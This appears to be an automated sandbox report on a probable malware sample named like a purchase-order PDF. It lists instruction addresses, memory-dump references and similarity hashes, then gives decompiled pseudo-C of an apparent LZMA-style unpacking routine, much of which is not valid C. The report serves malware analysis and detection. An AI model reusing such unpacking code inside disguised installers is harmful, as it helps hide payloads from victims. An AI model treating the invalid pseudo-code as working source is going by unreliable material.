0x00406ccd
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cef
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d35
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073dd
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x00407413
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743b
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406dcf
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
